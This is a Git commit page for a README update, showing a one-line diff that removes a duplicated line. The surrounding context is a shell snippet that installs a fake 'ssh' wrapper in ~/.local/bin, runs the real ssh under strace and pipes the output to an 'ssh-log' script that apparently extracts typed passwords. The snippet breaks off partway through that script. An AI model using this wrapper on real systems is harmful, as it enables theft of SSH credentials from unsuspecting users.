Update README.md

This commit is contained in:
SkyperTHC
2021-11-14 15:06:52 +00:00
committed by GitHub
parent 705c44b084
commit 8194e36f97
-1
View File
@@ -697,7 +697,6 @@ cat <<__EOF__>~/.local/bin/ssh
strace -e trace=read -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@
__EOF__
cat <<__EOF__ >~/.local/bin/ssh-log
cat <<__EOF__ >~/.local/bin/ssh-log
#! /bin/bash
grep 'read(4' | cut -f2 -d\\" | while read -r x; do